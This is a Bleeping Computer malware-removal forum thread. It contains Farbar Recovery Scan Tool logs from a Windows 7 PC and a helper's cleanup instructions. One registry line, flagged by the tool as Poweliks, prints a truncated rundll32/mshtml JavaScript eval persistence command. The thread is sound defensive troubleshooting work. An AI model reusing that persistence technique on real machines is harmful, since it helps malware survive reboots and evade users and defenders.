2014-10-15 13:56 - 2014-07-06 21:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-15 13:56 - 2014-07-06 21:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-15 13:56 - 2014-07-06 21:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-15 13:56 - 2014-07-06 21:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-15 13:56 - 2014-07-06 21:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-15 13:56 - 2014-07-06 21:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-15 13:56 - 2014-07-06 21:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-15 13:56 - 2014-07-06 21:28 - 00593920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-15 13:56 - 2014-06-27 20:21 - 00521384 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-15 13:56 - 2014-06-27 20:21 - 00455752 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-15 13:56 - 2014-06-27 20:21 - 00409272 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-01 09:16 - 2014-09-24 21:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-28 10:00 - 2011-03-21 11:19 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-28 10:00 - 2010-12-29 18:48 - 00073034 _____ () C:\Windows\PFRO.log
2014-10-28 10:00 - 2009-07-14 00:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-28 10:00 - 2009-07-14 00:39 - 00093295 _____ () C:\Windows\setupact.log
2014-10-28 09:59 - 2010-10-16 12:07 - 01671214 _____ () C:\Windows\WindowsUpdate.log
2014-10-28 09:57 - 2009-07-13 22:04 - 00000215 _____ () C:\Windows\system.ini
2014-10-28 09:42 - 2014-06-04 10:57 - 00000556 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3621039740-3434257137-3815352865-1001.job
2014-10-28 09:38 - 2012-08-29 09:07 - 00002131 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-28 09:38 - 2011-03-21 11:19 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-28 09:16 - 2012-04-03 09:22 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-27 17:26 - 2009-07-14 00:34 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-27 17:26 - 2009-07-14 00:34 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-27 17:25 - 2009-07-25 08:54 - 00782510 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-27 17:20 - 2012-05-01 10:33 - 00000000 ___RD () C:\Users\KELI\Dropbox
2014-10-27 17:19 - 2012-05-01 10:32 - 00000000 ____D () C:\Users\KELI\AppData\Roaming\Dropbox
2014-10-27 16:37 - 2009-07-13 22:37 - 00000000 ___RD () C:\Users\Public
2014-10-27 15:49 - 2014-06-04 10:56 - 00000000 ____D () C:\Users\KELI\AppData\Local\Citrix
2014-10-27 09:28 - 2012-01-10 10:25 - 00000316 _____ () C:\Windows\Tasks\HPCeeScheduleForKELI.job
2014-10-23 11:03 - 2009-07-14 00:52 - 00000000 ____D () C:\Windows\system32\FxsTmp
2014-10-22 09:16 - 2010-10-16 12:11 - 00000000 ____D () C:\ProgramData\PDFC
2014-10-16 11:53 - 2010-12-29 18:49 - 00000000 ____D () C:\Scans
2014-10-16 10:24 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\rescache
2014-10-16 09:58 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-16 09:27 - 2012-01-17 10:31 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2014-10-16 09:27 - 2011-04-12 09:27 - 00000052 _____ () C:\Windows\system32\DOErrors.log
2014-10-16 09:13 - 2009-07-14 00:33 - 00401032 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 09:12 - 2014-05-06 16:59 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-15 16:55 - 2013-08-14 17:10 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-15 16:52 - 2011-03-21 09:13 - 100290944 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-02 15:53 - 2011-03-21 11:46 - 00231568 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

Some content of TEMP:
====================
C:\Users\KELI\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpyafstv.dll


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-10-27 18:50

==================== End Of Log ============================

 

 



BC AdBot (Login to Remove)

 


#2 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:08:11 AM

Posted 28 October 2014 - 02:23 PM

Hi & :welcome: to Bleeping Computer Forums!
My name is Jürgen and I will be assisting you with your Malware related problems.

Before we move on, please read the following points carefully: :exclame:
  • My native language isn't English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.
  • Please read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
  • Perform everything in the correct order. Sometimes one step requires the previous one.
  • If you have any problems while you are follow my instructions, Stop there and tell me the exact nature of your problem.
  • Do not run any other scans without instruction or Add/ Remove Software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
  • Post all Logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
  • If I don't hear from you within 5 days from this initial or any subsequent post, then this thread will be closed.
  • If I don't reply within 24 hours please PM me!
  • Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
Step 1

frst.pngfrstscan.png

Start FRST with administator privileges.
  • Make sure the following option is checked: addition.png
  • Press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
    Please copy and paste these logs in your next reply.

regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#3 ScotDesort

ScotDesort
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:01:11 AM

Posted 29 October 2014 - 08:18 AM

FRST.LOG

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 27-10-2014 01
Ran by KELI (administrator) on ATTY-2 on 28-10-2014 10:01:43
Running from C:\Users\KELI\Desktop
Loaded Profile: KELI (Available profiles: KELI)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(McAfee, Inc.) C:\Program Files\McAfee\Managed VirusScan\VScan\EngineServer.exe
(InterVideo) C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
(Intel Corporation) C:\Program Files\Intel\AMT\LMS.exe
(PDF Complete Inc) C:\Program Files\PDF Complete\pdfsvc.exe
(Protexis Inc.) C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
() C:\Program Files\SiteAdvisor\6173\SAService.exe
(Intel Corporation) C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\PrintIsolationHost.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Intel Corporation) C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe
(McAfee, Inc.) C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.exe
() C:\Program Files\SiteAdvisor\6173\SiteAdv.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(KYOCERA MITA Corporation) C:\Program Files\Kyocera\FileUtility\NsCatCom.exe
(Adobe Systems Incorporated) C:\Program Files\Adobe\Reader 10.0\Reader\reader_sl.exe
(Dropbox, Inc.) C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Google) C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [7596576 2009-07-02] (Realtek Semiconductor)
HKLM\...\Run: [picon] => C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe [796696 2009-07-24] (Intel Corporation)
HKLM\...\Run: [PDF Complete] => C:\Program Files\PDF Complete\pdfsty.exe [563736 2009-06-18] (PDF Complete Inc)
HKLM\...\Run: [Microsoft Default Manager] => C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM\...\Run: [MVS Splash] => C:\Program Files\McAfee\Managed VirusScan\Agent\Splash.exe [562496 2009-11-17] (McAfee, Inc.)
HKLM\...\Run: [McAfee Managed Services Tray] => C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.Exe [95552 2009-11-17] (McAfee, Inc.)
HKLM\...\Run: [SiteAdvisor] => C:\Program Files\SiteAdvisor\6173\SiteAdv.exe [36640 2007-08-28] ()
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\RunOnce: [NCPluginUpdater] => C:\Program Files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe [21720 2014-10-21] (Hewlett-Packard)
HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-03-21] (Google Inc.)
HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Scanner File Utility.lnk
ShortcutTarget: Scanner File Utility.lnk -> C:\Program Files\Kyocera\FileUtility\NsCatCom.exe (KYOCERA MITA Corporation)
Startup: C:\Users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPCOM/1
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: No Name -> {089FD14D-132B-48FC-8861-0048AE113215} -> C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Bing Bar BHO -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - @C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll,-100 - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
Toolbar: HKLM - McAfee SiteAdvisor - {0BF43445-2F28-4351-9252-17FE6E806AA0} - C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: myrm - {4D034FC3-013F-4b95-B544-44D49ABE3E76} - C:\Program Files\McAfee\Managed VirusScan\Agent\myRmProt4.9.2.358.dll (McAfee, Inc.)
Handler: siteadvisor - {3A5DC592-7723-4EAA-9EE6-AF4222BCF879} - C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
Tcpip\..\Interfaces\{47CED9F3-6727-4E66-BBD7-559438BB948D}: [NameServer] 167.206.245.130,167.206.245.129
 
FireFox:
========
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @Microsoft.com/NpWinExt,version=5.0 -> C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\KELI\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM\...\Firefox\Extensions: [msntoolbar@msn.com] - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\Firefox
FF Extension: Bing Bar - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\Firefox [2010-10-16]
FF HKLM\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2010-10-16]
FF HKLM\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension
FF Extension: Default Manager - C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DMExtension [2010-10-16]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\38.0.2125.104\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\38.0.2125.104\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\38.0.2125.104\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll No File
CHR Plugin: (Bing Bar) - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
CHR Profile: C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-18]
CHR Extension: (Google Wallet) - C:\Users\KELI\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-04-01]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 EngineServer; C:\Program Files\McAfee\Managed VirusScan\VScan\EngineServer.exe [14144 2009-06-02] (McAfee, Inc.)
S2 HP Support Assistant Service; C:\Program Files\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
S4 McShield; C:\Program Files\McAfee\Managed VirusScan\VScan\McShield.exe [144704 2009-06-02] (McAfee, Inc.)
S4 myAgtSvc; C:\Program Files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe [221024 2009-11-17] (McAfee, Inc.)
R2 pdfcDispatcher; C:\Program Files\PDF Complete\pdfsvc.exe [635416 2009-06-18] (PDF Complete Inc)
R2 SiteAdvisor Service; C:\Program Files\SiteAdvisor\6173\SAService.exe [341280 2010-10-16] ()
R2 UNS; C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2066968 2009-07-24] (Intel Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-10-27] (Malwarebytes Corporation)
S3 MfeAVFK; C:\Windows\System32\drivers\MfeAVFK.sys [79816 2009-05-15] (McAfee, Inc.)
S3 MfeBOPK; C:\Windows\System32\drivers\MfeBOPK.sys [35272 2009-05-15] (McAfee, Inc.)
R1 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [214024 2009-05-15] (McAfee, Inc.)
S3 MfeRKDK; C:\Windows\System32\drivers\MfeRKDK.sys [34248 2009-05-15] (McAfee, Inc.)
R1 mfetdik; C:\Windows\System32\drivers\mfetdik.sys [55336 2009-05-15] (McAfee, Inc.)
R3 vpcbus; C:\Windows\System32\DRIVERS\vpchbus.sys [172416 2010-11-20] (Microsoft Corporation)
R1 vpcnfltr; C:\Windows\System32\DRIVERS\vpcnfltr.sys [48128 2010-11-20] (Microsoft Corporation)
R3 vpcusb; C:\Windows\System32\DRIVERS\vpcusb.sys [78336 2010-11-20] (Microsoft Corporation)
R1 vpcvmm; C:\Windows\System32\drivers\vpcvmm.sys [296064 2010-11-20] (Microsoft Corporation)
S3 catchme; \??\C:\Users\KELI\AppData\Local\Temp\catchme.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-28 09:58 - 2014-10-28 09:58 - 00047174 _____ () C:\ComboFix.txt
2014-10-28 09:48 - 2014-10-28 09:58 - 00000000 ____D () C:\Qoobox
2014-10-28 09:48 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-10-28 09:48 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-10-28 09:48 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-10-28 09:48 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-10-28 09:46 - 2014-10-28 09:48 - 01998336 _____ () C:\Users\KELI\Downloads\AdwCleaner.exe
2014-10-28 09:45 - 2014-10-28 09:44 - 05591695 ____R (Swearware) C:\Users\KELI\Desktop\ComboFix.exe
2014-10-28 09:43 - 2014-10-28 09:44 - 05591695 _____ (Swearware) C:\Users\KELI\Downloads\ComboFix.exe
2014-10-28 09:24 - 2014-10-28 09:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller (1).exe
2014-10-28 09:23 - 2014-10-28 09:24 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\KELI\Downloads\tdsskiller.exe
2014-10-27 17:24 - 2014-10-27 17:24 - 00003189 _____ () C:\Users\KELI\Desktop\Sophos Virus Removal Tool.lnk
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\Users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sophos
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\ProgramData\Sophos
2014-10-27 17:24 - 2014-10-27 17:24 - 00000000 ____D () C:\Program Files\Sophos
2014-10-27 17:18 - 2014-10-27 17:19 - 00000000 ____D () C:\NPE
2014-10-27 16:54 - 2014-10-27 17:21 - 00000000 ____D () C:\Users\KELI\AppData\Local\NPE
2014-10-27 16:54 - 2014-10-27 16:54 - 00000000 ____D () C:\ProgramData\Norton
2014-10-27 16:53 - 2014-10-27 16:56 - 103020744 _____ (Sophos Limited) C:\Users\KELI\Downloads\Sophos Virus Removal Tool.exe
2014-10-27 16:52 - 2014-10-27 16:53 - 03060320 ____N (Symantec Corporation) C:\Users\KELI\Downloads\NPE.exe
2014-10-27 16:16 - 2014-10-28 09:45 - 00000000 ____D () C:\Windows\erdnt
2014-10-27 16:12 - 2014-10-27 16:13 - 00025282 _____ () C:\Users\KELI\Desktop\Addition.txt
2014-10-27 16:11 - 2014-10-28 10:02 - 00013066 _____ () C:\Users\KELI\Desktop\FRST.txt
2014-10-27 16:11 - 2014-10-28 10:01 - 00000000 ____D () C:\FRST
2014-10-27 16:10 - 2014-10-27 16:10 - 01706144 _____ (Thisisu) C:\Users\KELI\Downloads\JRT.exe
2014-10-27 16:10 - 2014-10-27 16:10 - 01706144 _____ (Thisisu) C:\Users\KELI\Downloads\JRT (1).exe
2014-10-27 16:07 - 2014-10-27 16:07 - 01104896 _____ (Farbar) C:\Users\KELI\Downloads\FRST.exe
2014-10-27 16:07 - 2014-10-27 16:07 - 01104896 _____ (Farbar) C:\Users\KELI\Desktop\FRST.exe
2014-10-27 15:28 - 2014-10-27 16:41 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-27 15:28 - 2014-10-27 15:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-27 15:28 - 2014-10-27 15:29 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-27 15:28 - 2014-10-27 15:28 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-27 15:28 - 2014-10-01 11:11 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-27 15:28 - 2014-10-01 11:11 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-27 15:28 - 2014-10-01 11:11 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-22 12:44 - 2014-10-22 17:04 - 00000000 ___HD () C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2014-10-22 12:44 - 2014-10-22 12:44 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-10-15 13:57 - 2014-10-09 21:44 - 00396288 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 13:57 - 2014-10-09 21:44 - 00230912 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 13:57 - 2014-10-09 21:39 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 13:57 - 2014-10-06 22:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-15 13:57 - 2014-09-28 20:41 - 02379264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 13:57 - 2014-09-25 18:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-15 13:57 - 2014-09-25 18:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-15 13:57 - 2014-09-25 18:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-15 13:57 - 2014-09-25 18:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-15 13:57 - 2014-09-25 18:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-15 13:57 - 2014-09-18 21:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-15 13:57 - 2014-09-18 21:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-15 13:57 - 2014-09-18 21:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-15 13:57 - 2014-09-18 21:14 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-15 13:57 - 2014-09-18 21:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-15 13:57 - 2014-09-18 21:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-15 13:57 - 2014-09-18 21:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-15 13:57 - 2014-09-18 20:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-15 13:57 - 2014-09-18 20:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-15 13:57 - 2014-09-18 20:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-15 13:57 - 2014-09-18 20:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-15 13:57 - 2014-09-18 20:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-15 13:57 - 2014-09-18 20:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-15 13:57 - 2014-09-18 20:50 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
